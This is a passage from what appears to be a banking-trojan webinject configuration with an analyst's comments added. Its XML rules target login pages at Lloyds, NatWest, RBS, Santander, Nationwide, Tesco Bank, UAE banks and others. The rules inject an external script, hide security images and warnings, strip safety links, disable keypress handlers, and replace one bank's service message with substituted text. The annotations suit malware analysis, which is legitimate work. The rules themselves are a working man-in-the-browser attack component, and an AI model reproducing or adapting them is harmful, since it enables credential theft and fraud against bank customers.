        <!-- Analyst note: matches login.aspx or default.aspx on the Isle of Man Bank online-banking host. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2109. <conditions>
  2110. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.onlinebanking\.iombank\.com/(login|default)\.aspx</url>
  2111. </conditions>
  2112. <actions>
  2113. <modify>
  2114. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2115. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2116. </modify>
  2117. </actions>
  2118. </httpinject>
  2119. <httpinject>
        <!-- Analyst note: no script is injected by this rule. On login.aspx or default.aspx of this host, the attribute text class="frame securityImage" gets style="display:none;" appended, hiding the element with that class. The class name suggests a security graphic shown to the customer; the page markup is not part of this listing, so that is an inference. -->
  2120. <conditions>
  2121. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.onlinebanking\.iombank\.com/(login|default)\.aspx</url>
  2122. </conditions>
  2123. <actions>
  2124. <modify>
  2125. <pattern modifiers="i"><![CDATA[(class="frame securityImage")]]></pattern>
  2126. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  2127. </modify>
  2128. </actions>
  2129. </httpinject>
  2130. <httpinject>
        <!-- Analyst note: everything under /eai/IPB_EAI_Web/ on this host is in scope. Two edits: a script element (relative src scripts/webcticker.js) after the closing form tag, and removal of a META refresh tag. -->
  2131. <conditions>
  2132. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.iombankibanking\.com/eai/IPB_EAI_Web/</url>
  2133. </conditions>
  2134. <actions>
  2135. <modify>
  2136. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2137. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2138. </modify>
        <!-- Deletes (empty replacement) any META http-equiv="refresh" tag, so the page no longer reloads or redirects by that mechanism. -->
  2139. <modify>
  2140. <pattern modifiers="iU"><![CDATA[<META http\-equiv="refresh" content=".*">]]></pattern>
  2141. <replacement><![CDATA[]]></replacement>
  2142. </modify>
  2143. </actions>
  2144. </httpinject>
  2145. <httpinject>
        <!-- Analyst note: targets the LloydsLink Logon.jsp URL (the url text is followed by a line break before its closing tag in this listing). Two edits: a script element (relative src scripts/webcticker.js) after the closing form tag, and a rewrite of the document head. -->
  2146. <conditions>
  2147. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://lloydslink\.online\.lloydsbank\.com/Logon/Logon\.jsp
  2148. </url>
  2149. </conditions>
  2150. <actions>
  2151. <modify>
  2152. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2153. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2154. </modify>
        <!-- Everything between name="GENERATOR"> and the closing HEAD tag is dropped, so whatever the page declares in that part of its head (scripts, styles, meta tags) is removed. What exactly sits there is not visible in this listing. -->
  2155. <modify>
  2156. <pattern modifiers="isU"><![CDATA[name="GENERATOR">.*</HEAD>]]></pattern>
  2157. <replacement><![CDATA[name="GENERATOR"></HEAD>]]></replacement>
  2158. </modify>
  2159. </actions>
  2160. </httpinject>
  2161. <httpinject>
        <!-- Analyst note: content substitution on the bank's service-message page (http or https). After the closing title tag the rule injects a style that hides the body and a jQuery snippet. The snippet gives id secid to the div.cms-content containing the sentence "If you receive a request to confirm personal contact information do not respond", removes the paragraphs inside it, appends replacement paragraphs (a notice dated 21 October that talks about Dyre/Dyreza malware), and then shows the body again. Net effect as written: the visitor sees the substituted text in place of the original paragraphs. Several alternative selectors are left commented out inside the snippet. No reference to scripts/webcticker.js appears in this rule. -->
  2162. <conditions>
  2163. <url type="allow" onpost="1" onget="1" modifiers="iU">^https?://www\.lloydsbankcommercial\.com/servicemessage
  2164. </url>
  2165. </conditions>
  2166. <actions>
  2167. <modify>
  2168. <pattern modifiers="isU"><![CDATA[(</title>)]]></pattern>
  2169. <replacement><![CDATA[\1
  2170. <style>
  2171. body {display:none;}
  2172. </style>
  2173. <script>
  2174. $(document).ready(function() {
  2175. //$('em:contains("If you receive a request to confirm personal contact information do not respond")').parent().hide();
  2176. //$('div.cms-content:contains("Call the LloydsLink online Help Desk")').children().css('visibility', 'hidden');
  2177. $('div.cms-content:contains("If you receive a request to confirm personal contact information do not respond")').attr('id', 'secid');
  2178. //$('strong:contains("LLOYDSLINK ONLINE SECURITY")').parent().attr('id', 'secid');
  2179. //$('p:contains("If you have any questions, the Helpdesk can be contacted on")').hide().next().hide();
  2180. $('#secid').find('p').remove();
  2181. $('#secid').append('<p><strong>1) IMPORTANT SECURITY INFORMATION</strong>&nbsp;<img title="Urgent Message" alt="Urgent Message" src="/uploadedImages/Service_Message/Content/urgent(1).jpg"> &nbsp;</p><p><em>21 October</em>&nbsp;</p><p>&nbsp;</p><p>Lloyds Banking Group is aware that the Dyre malware (also known as Dyreza) is currently actively targeting financial institutions across the UK including customers of LloydsLink online.</p><p>&nbsp;<br>This is not a vulnerability within LloydsLink online but malware that resides on infected computer systems designed to steal user log-in credentials.</p><p>&nbsp;<br>We recommend you:</p><p>&nbsp;</p><p>1.&nbsp;Work with your IT security providers to confirm that your anti-malware solution is capable of detecting and removing the very latest variants of Dyre.</p><p>2.&nbsp;Carry out comprehensive scans of any systems used to access LloydsLink, as well as any other financial service institution or financial orientated software that you use and transact on.</p><p>3.&nbsp;Change Passwords and memorable information, following the comprehensive scans of your systems.</p><p><br>Please remember it is important to check all beneficiary details, especially bank sort codes and account numbers, before creating and approving all payments.</p><p>&nbsp;</p><p>For more information on protecting your payments please visit our <strong><a class="tu" title="Security Centre" href=" https://www.lloydsbankcommercial.com/lloydslinkonlinesupport/security/?utm_source=Main&amp;amp;utm_medium=sw_update&amp;amp;utm_term=na&amp;amp;utm_content=na&amp;amp;utm_campaign=sm">Security Centre</a></strong>.&nbsp;<br>&nbsp;</p><p><span>&nbsp;</span>&nbsp;</p><p><a class="tu" title="Protect Yourself And Your Payments - Green" href="https://www.lloydsbankcommercial.com/lloydslinkonlinesupport/security/"><img title="Protect Yourself And Your Payments - Green" alt="Protect Yourself And Your Payments - Green" 
src="/uploadedImages/Service_Message/Content/ProtectYourselfAndYourPayments-Green.jpg" border="0"></a>&nbsp;</p>');
  2182. //var pIndex = $('#secid').parent().children().index($('#secid'));
  2183. //$('#secid').parent().find('> *:gt('+pIndex+')').hide();
  2184. //$('#secid').replaceWith('<p> <strong>3) KEEPING YOUR PC SECURE <img title="Reminder Message" alt="Reminder Message" src="/uploadedImages/Service_Message/Content/reminder(1).jpg" /> </strong> </p><p><strong></strong> </p><p><strong>Protect against viruses</strong> </p><p> </p><ul><li>Use anti-virus software and <strong>ensure that it is kept up to date </strong>- this should protect your computer against the latest viruses</li><li>Use up-to-date anti-spyware software to protect against programs that fraudsters can use to collect information about your Internet usage</li></ul><p> </p><p><strong>Keep your software up-to-date</strong> </p><p> </p><p>Occasionally publishers discover vulnerabilities in their products and issue \'patches\' to protect against any security threats. It is important that you regularly visit the website of the company which produces your operating system (e.g. Windows XP) and browser (e.g. Internet Explorer) to check for any patches or updates they may have issued.</p><p> </p><p> </p>');
  2185. $('body').show();
  2186. });
  2187. </script>
  2188. ]]></replacement>
  2189. </modify>
  2190. </actions>
  2191. </httpinject>
  2192. <httpinject>
        <!-- Analyst note: both the retail and corporate Metro Bank hosts are covered, with no path restriction. A script element (relative src scripts/webcticker.js) is inserted just before the closing body tag. The script is not included in this listing. -->
  2193. <conditions>
  2194. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://(retail|corporate)\.metrobankonline\.co\.uk</url>
  2195. </conditions>
  2196. <actions>
  2197. <modify>
  2198. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  2199. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  2200. </modify>
  2201. </actions>
  2202. </httpinject>
  2203. <httpinject>
        <!-- Analyst note: targets the Login.do page of the mint.co.uk card-servicing site. The pattern (</form>) is replaced by itself plus a script element with relative src scripts/webcticker.js. The script is not included in this listing. -->
  2204. <conditions>
  2205. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cardservicing\.mint\.co\.uk/RBSG\_Consumer/Login\.do</url>
  2206. </conditions>
  2207. <actions>
  2208. <modify>
  2209. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2210. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2211. </modify>
  2212. </actions>
  2213. </httpinject>
  2214. <httpinject>
        <!-- Analyst note: targets the orbilogin.jsp page on online.nbad.com. The pattern (</form>) is replaced by itself plus a script element with relative src scripts/webcticker.js. The script is not included in this listing. -->
  2215. <conditions>
  2216. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.nbad\.com/iportalweb/iportal/jsps/orbilogin\.jsp</url>
  2217. </conditions>
  2218. <actions>
  2219. <modify>
  2220. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2221. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2222. </modify>
  2223. </actions>
  2224. </httpinject>
  2225. <httpinject>
        <!-- Analyst note: matches /corporate/BANKAWAY on nbf.ae when followed by a semicolon, a query string or the end of the URL. Three edits: a script element (relative src scripts/webcticker.js) after the closing form tag, and two style changes that hide page elements by class. -->
  2226. <conditions>
  2227. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://nbf\.ae/corporate/BANKAWAY(;|\?|$)</url>
  2228. </conditions>
  2229. <actions>
  2230. <modify>
  2231. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2232. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2233. </modify>
        <!-- Elements with class "post" get display:none, removing them from the layout; their content is not visible in this listing. -->
  2234. <modify>
  2235. <pattern modifiers="i"><![CDATA[( class="post")]]></pattern>
  2236. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  2237. </modify>
        <!-- Elements with class "phone" get visibility:hidden, so they keep their space but are not shown; the class name suggests contact details (inference). -->
  2238. <modify>
  2239. <pattern modifiers="i"><![CDATA[( class="phone")]]></pattern>
  2240. <replacement><![CDATA[\1 style="visibility:hidden;"]]></replacement>
  2241. </modify>
  2242. </actions>
  2243. </httpinject>
  2244. <httpinject>
        <!-- Analyst note: targets the BANKAWAY URL with the Action.CorpUser.Init query on nbqonline.ae. Two edits: a script element (relative src scripts/webcticker.js) before the closing body tag, and deletion of a link. -->
  2245. <conditions>
  2246. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://nbqonline\.ae/corp/BANKAWAY\?Action\.CorpUser\.Init</url>
  2247. </conditions>
  2248. <actions>
  2249. <modify>
  2250. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  2251. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  2252. </modify>
        <!-- Deletes (empty replacement) the markup running from an anchor with a javascript: href, through the text "Trouble&", to the next closing span tag. The visible label of that link is not shown in this listing. -->
  2253. <modify>
  2254. <pattern modifiers="isU"><![CDATA[<a href="javascript.*Trouble&.*</span>]]></pattern>
  2255. <replacement><![CDATA[]]></replacement>
  2256. </modify>
  2257. </actions>
  2258. </httpinject>
  2259. <httpinject>
        <!-- Analyst note: targets the Nationwide AccessManagement/Login path. The pattern (</form>) is replaced by itself plus a script element with relative src scripts/webcticker.js. The script is not included in this listing. -->
  2260. <conditions>
  2261. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://onlinebanking\.nationwide\.co\.uk/AccessManagement/Login</url>
  2262. </conditions>
  2263. <actions>
  2264. <modify>
  2265. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2266. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2267. </modify>
  2268. </actions>
  2269. </httpinject>
  2270. <httpinject>
        <!-- Analyst note: every path on the NatWest Bankline host is in scope (the url text is followed by a line break before its closing tag in this listing). Three edits: a script element (relative src scripts/webcticker.js) after the closing form tag, and two changes that hide images. -->
  2271. <conditions>
  2272. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bankline\.natwest\.com/
  2273. </url>
  2274. </conditions>
  2275. <actions>
  2276. <modify>
  2277. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2278. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2279. </modify>
        <!-- The tag referencing phoneAdvice_nwb.png gets visibility:hidden and id="phoneAdvice". The file name suggests an advice graphic from the bank (inference). -->
  2280. <modify>
  2281. <pattern modifiers="i"><![CDATA[(phoneAdvice_nwb\.png")]]></pattern>
  2282. <replacement><![CDATA[\1 style="visibility:hidden;" id="phoneAdvice"]]></replacement>
  2283. </modify>
        <!-- Same treatment for readerAdvice_nwb.png. Note that it is given the same id value, phoneAdvice, so the rewritten page ends up with a duplicated id if both images are present. -->
  2284. <modify>
  2285. <pattern modifiers="i"><![CDATA[(readerAdvice_nwb\.png")]]></pattern>
  2286. <replacement><![CDATA[\1 style="visibility:hidden;" id="phoneAdvice"]]></replacement>
  2287. </modify>
  2288. </actions>
  2289. </httpinject>
  2290. <httpinject>
        <!-- Analyst note: the host allows an optional numeric suffix after ib, and the path is the IB.Web Login.aspx page. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2291. <conditions>
  2292. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ib\d*\.npbs\.co\.uk/IB\.Web/Login\.aspx</url>
  2293. </conditions>
  2294. <actions>
  2295. <modify>
  2296. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2297. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2298. </modify>
  2299. </actions>
  2300. </httpinject>
  2301. <httpinject>
        <!-- Analyst note: targets the formslogin.asp page of the Bank of Scotland professionals-online site. The pattern (</form>) is replaced by itself plus a script element with relative src scripts/webcticker.js. The script is not included in this listing. -->
  2302. <conditions>
  2303. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://professionalson\-line\.bankofscotlandbusiness\.co\.uk/\_mem\_bin/formslogin\.asp</url>
  2304. </conditions>
  2305. <actions>
  2306. <modify>
  2307. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2308. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2309. </modify>
  2310. </actions>
  2311. </httpinject>
  2312. <httpinject>
        <!-- Analyst note: five my.rbs.com host prefixes are listed (edi, del, hkg, lon, sta), with no path restriction. Two edits: a script element (relative src scripts/webcticker.js) placed after the closing html tag, and a rewrite of one of the page's own JavaScript functions. -->
  2313. <conditions>
  2314. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://(edi|del|hkg|lon|sta)\.my\.rbs\.com</url>
  2315. </conditions>
  2316. <actions>
  2317. <modify>
  2318. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  2319. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2320. </modify>
        <!-- "function checkKey(e)" becomes "function checkKey(e){}function checkKey1(e)": checkKey is turned into an empty function and the page's original body ends up under the new name checkKey1. As written, whatever the page's checkKey handler did no longer runs when checkKey is called. -->
  2321. <modify>
  2322. <pattern modifiers="i"><![CDATA[(function checkKey\(e\))]]></pattern>
  2323. <replacement><![CDATA[\1{}function checkKey1(e)]]></replacement>
  2324. </modify>
  2325. </actions>
  2326. </httpinject>
  2327. <httpinject>
        <!-- Analyst note: every path on the RBS Bankline host is in scope (the url text is followed by a line break before its closing tag in this listing). Three edits: a script element (relative src scripts/webcticker.js) after the closing form tag, and two changes that hide images. -->
  2328. <conditions>
  2329. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bankline\.rbs\.com/
  2330. </url>
  2331. </conditions>
  2332. <actions>
  2333. <modify>
  2334. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2335. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2336. </modify>
        <!-- The tag referencing phoneAdvice_rbs.png gets visibility:hidden and id="phoneAdvice". The file name suggests an advice graphic from the bank (inference). -->
  2337. <modify>
  2338. <pattern modifiers="i"><![CDATA[(phoneAdvice_rbs\.png")]]></pattern>
  2339. <replacement><![CDATA[\1 style="visibility:hidden;" id="phoneAdvice"]]></replacement>
  2340. </modify>
        <!-- The tag referencing readerAdvice_rbs.png gets visibility:hidden only; no id is added in this rule. -->
  2341. <modify>
  2342. <pattern modifiers="i"><![CDATA[(readerAdvice_rbs\.png")]]></pattern>
  2343. <replacement><![CDATA[\1 style="visibility:hidden;"]]></replacement>
  2344. </modify>
  2345. </actions>
  2346. </httpinject>
  2347. <httpinject>
        <!-- Analyst note: no script is injected by this rule. On the public bankline.ashx page (http or https) the markup from div class="right" up to div class="sidebar extRHS" is collapsed and the right-hand div is given display:none, so that column is not rendered. NOTE(review): the dot after www in the URL pattern is not escaped, so it matches any single character there. -->
  2348. <conditions>
  2349. <url type="allow" onpost="1" onget="1" modifiers="iU">^https?://www.rbs\.co\.uk/corporate/electronic\-services/g1/bankline\.ashx
  2350. </url>
  2351. </conditions>
  2352. <actions>
  2353. <modify>
  2354. <pattern modifiers="isU"><![CDATA[<div class="right">.*<div>.*<div class="sidebar extRHS">]]></pattern>
  2355. <replacement><![CDATA[<div class="right" style="display:none;"><div><div class="sidebar extRHS">]]></replacement>
  2356. </modify>
  2357. </actions>
  2358. </httpinject>
  2359. <httpinject>
        <!-- Analyst note: everything under /LGSBBI_NS_ENS/ on the Santander business host is in scope. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2360. <conditions>
  2361. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://business\.santander\.co\.uk/LGSBBI\_NS\_ENS/</url>
  2362. </conditions>
  2363. <actions>
  2364. <modify>
  2365. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2366. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2367. </modify>
  2368. </actions>
  2369. </httpinject>
  2370. <httpinject>
        <!-- Analyst note: everything under /LOGSCU_NS_ENS/ on the Santander corporate host is in scope. Here the script element (relative src scripts/webcticker.js) is placed after the closing html tag, that is, outside the document element. The script is not included in this listing. -->
  2371. <conditions>
  2372. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://corporate\.santander\.co\.uk/LOGSCU_NS_ENS/</url>
  2373. </conditions>
  2374. <actions>
  2375. <modify>
  2376. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
  2377. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2378. </modify>
  2379. </actions>
  2380. </httpinject>
  2381. <httpinject>
        <!-- Analyst note: unlike most rules in this listing, the target is a VPN login page (vpnloginpage.html on hosts starting with vpn under sjp.co.uk) rather than an online-banking page. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2382. <conditions>
  2383. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://vpn.*\.sjp\.co\.uk/vpn/vpnloginpage\.html</url>
  2384. </conditions>
  2385. <actions>
  2386. <modify>
  2387. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2388. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2389. </modify>
  2390. </actions>
  2391. </httpinject>
  2392. <httpinject>
        <!-- Analyst note: targets URLs starting with /sss/auth on the Tesco Bank host. The pattern (</form>) is replaced by itself plus a script element with relative src scripts/webcticker.js. The script is not included in this listing. -->
  2393. <conditions>
  2394. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.tescobank\.com/sss/auth</url>
  2395. </conditions>
  2396. <actions>
  2397. <modify>
  2398. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2399. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2400. </modify>
  2401. </actions>
  2402. </httpinject>
  2403. <httpinject>
        <!-- Analyst note: scoped to the Triodos login.seam page with loginType=dp550. Two edits: a script element (relative src scripts/webcticker.js) after the closing form tag, and a change to the page's own JavaScript. -->
  2404. <conditions>
  2405. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://banking\.triodos\.co\.uk/ib\-seam/login\.seam\?loginType=dp550</url>
  2406. </conditions>
  2407. <actions>
  2408. <modify>
  2409. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2410. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2411. </modify>
        <!-- The text document.forms['loginForm'].onkeypress is swapped for "var fnc934". Presumably the page assigns a handler at that point, in which case the handler would land in an unused variable and never be attached to the form; the surrounding page script is not shown, so confirm against the real page. -->
  2412. <modify>
  2413. <pattern modifiers="i"><![CDATA[document\.forms\['loginForm'\]\.onkeypress]]></pattern>
  2414. <replacement><![CDATA[var fnc934]]></replacement>
  2415. </modify>
  2416. </actions>
  2417. </httpinject>
  2418. <httpinject>
        <!-- Analyst note: matches login.aspx or default.aspx on the Ulster Bank Anytime Banking host. The url modifiers attribute is empty here, so URL matching is presumably case-sensitive (assumes PCRE-style flags). The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2419. <conditions>
  2420. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.ulsterbankanytimebanking\.co\.uk/(login|default)\.aspx</url>
  2421. </conditions>
  2422. <actions>
  2423. <modify>
  2424. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2425. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2426. </modify>
  2427. </actions>
  2428. </httpinject>
  2429. <httpinject>
        <!-- Analyst note: no script is injected by this rule. On login.aspx or default.aspx of this host, the attribute text class="frame securityImage" gets style="display:none;" appended, hiding the element with that class. The class name suggests a security graphic shown to the customer; the page markup is not part of this listing, so that is an inference. -->
  2430. <conditions>
  2431. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.ulsterbankanytimebanking\.co\.uk/(login|default)\.aspx</url>
  2432. </conditions>
  2433. <actions>
  2434. <modify>
  2435. <pattern modifiers="i"><![CDATA[(class="frame securityImage")]]></pattern>
  2436. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  2437. </modify>
  2438. </actions>
  2439. </httpinject>
  2440. <httpinject>
        <!-- Analyst note: every path on the Ulster Bank Bankline host, on both the ie and co.uk domains, is in scope (the url text is followed by a line break before its closing tag in this listing). Three edits: a script element (relative src scripts/webcticker.js) after the closing form tag, and two changes that hide images. -->
  2441. <conditions>
  2442. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bankline\.ulsterbank\.(ie|co\.uk)/
  2443. </url>
  2444. </conditions>
  2445. <actions>
  2446. <modify>
  2447. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2448. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2449. </modify>
        <!-- The tag referencing securitywarn_ulster.jpg gets visibility:hidden and id="phoneAdvice". The file name suggests a security warning graphic from the bank (inference). -->
  2450. <modify>
  2451. <pattern modifiers="i"><![CDATA[(securitywarn\_ulster\.jpg")]]></pattern>
  2452. <replacement><![CDATA[\1 style="visibility:hidden;" id="phoneAdvice"]]></replacement>
  2453. </modify>
        <!-- The tag referencing cardReader_ulster.jpg gets visibility:hidden only; no id is added in this rule. -->
  2454. <modify>
  2455. <pattern modifiers="i"><![CDATA[(cardReader\_ulster\.jpg")]]></pattern>
  2456. <replacement><![CDATA[\1 style="visibility:hidden;"]]></replacement>
  2457. </modify>
  2458. </actions>
  2459. </httpinject>
  2460. <httpinject>
        <!-- Analyst note: targets the WBankDsp.exe e-banking endpoint under /ebanking/London/ on hvbrsce.com. A script element (relative src scripts/webcticker.js) is inserted just before the closing body tag. The script is not included in this listing. -->
  2461. <conditions>
  2462. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.hvbrsce\.com/ebanking/London/EXE/WBankDsp\.exe</url>
  2463. </conditions>
  2464. <actions>
  2465. <modify>
  2466. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
  2467. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
  2468. </modify>
  2469. </actions>
  2470. </httpinject>
  2471. <httpinject>
        <!-- Analyst note: targets main_login.asp on www.unb.com. Three edits: a script element (relative src scripts/webcticker.js) after the closing form tag, and deletion of two table rows from the login page. -->
  2472. <conditions>
  2473. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.unb\.com/uninet/main\_login\.asp</url>
  2474. </conditions>
  2475. <actions>
  2476. <modify>
  2477. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2478. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2479. </modify>
        <!-- Deletes (empty replacement) the table row that links to safety_flyer.htm; the file name suggests safety guidance from the bank (inference). -->
  2480. <modify>
  2481. <pattern modifiers="isU"><![CDATA[<tr><td align="center"><a href="safety_flyer\.htm".*</tr>]]></pattern>
  2482. <replacement><![CDATA[]]></replacement>
  2483. </modify>
        <!-- Deletes a centred table row that opens with bold Arial size 3 text; its wording is not part of the pattern, so what the row says cannot be told from this listing. -->
  2484. <modify>
  2485. <pattern modifiers="isU"><![CDATA[<tr><td align="center"><b><font face="Arial" size="3">.*</tr>]]></pattern>
  2486. <replacement><![CDATA[]]></replacement>
  2487. </modify>
  2488. </actions>
  2489. </httpinject>
  2490. <httpinject>
        <!-- Analyst note: every path on cib.uab.ae is in scope. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2491. <conditions>
  2492. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cib\.uab\.ae/</url>
  2493. </conditions>
  2494. <actions>
  2495. <modify>
  2496. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2497. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2498. </modify>
  2499. </actions>
  2500. </httpinject>
  2501. <httpinject>
        <!-- Analyst note: the URL pattern has no trailing slash or path, so it is a prefix match on https://www.unity-online.co.uk. The action appends a script element (relative src scripts/webcticker.js) after the closing form tag; the script is not part of this listing. -->
  2502. <conditions>
  2503. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.unity\-online\.co\.uk</url>
  2504. </conditions>
  2505. <actions>
  2506. <modify>
  2507. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2508. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2509. </modify>
  2510. </actions>
  2511. </httpinject>
  2512. <httpinject>
        <!-- Analyst note: targets the login1.do authentication page on online.ybs.co.uk. The pattern (</form>) is replaced by itself plus a script element with relative src scripts/webcticker.js. The script is not included in this listing. -->
  2513. <conditions>
  2514. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.ybs\.co\.uk/public/authentication/login1\.do</url>
  2515. </conditions>
  2516. <actions>
  2517. <modify>
  2518. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2519. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2520. </modify>
  2521. </actions>
  2522. </httpinject>
  2523. <httpinject>
        <!-- Analyst note: matches login.aspx or default.aspx on www.nwolb.com (the url text is followed by a line break before its closing tag in this listing). Two edits: a script element (relative src scripts/webcticker.js) after the closing form tag, and hiding of an element by class. -->
  2524. <conditions>
  2525. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.nwolb\.com/(login|default)\.aspx
  2526. </url>
  2527. </conditions>
  2528. <actions>
  2529. <modify>
  2530. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2531. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2532. </modify>
        <!-- The element with class "frame securityImage" gets display:none. The class name suggests a security graphic shown to the customer (inference; the page markup is not part of this listing). -->
  2533. <modify>
  2534. <pattern modifiers="i"><![CDATA[(class="frame securityImage")]]></pattern>
  2535. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
  2536. </modify>
  2537. </actions>
  2538. </httpinject>
  2539. <httpinject>
        <!-- Analyst note: matches the Lloyds Bank logon.aspx page, either at the end of the URL or followed by a query string (the url text is followed by a line break before its closing tag in this listing). Two edits: a script element (relative src scripts/webcticker.js) after the closing form tag, and blanking of a message span. -->
  2540. <conditions>
  2541. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://banking\.lloydsbank\.com/Logon/logon\.aspx(\?|$)
  2542. </url>
  2543. </conditions>
  2544. <actions>
  2545. <modify>
  2546. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
  2547. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
  2548. </modify>
